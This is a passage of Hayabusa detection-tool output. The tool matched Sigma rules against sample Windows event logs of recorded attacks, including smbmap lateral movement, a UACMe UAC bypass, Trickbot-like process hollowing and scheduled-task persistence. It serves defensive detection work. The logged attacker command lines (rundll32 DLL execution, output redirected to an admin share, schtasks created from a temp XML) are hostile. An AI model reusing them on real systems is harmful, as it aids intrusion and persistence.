07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx 2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 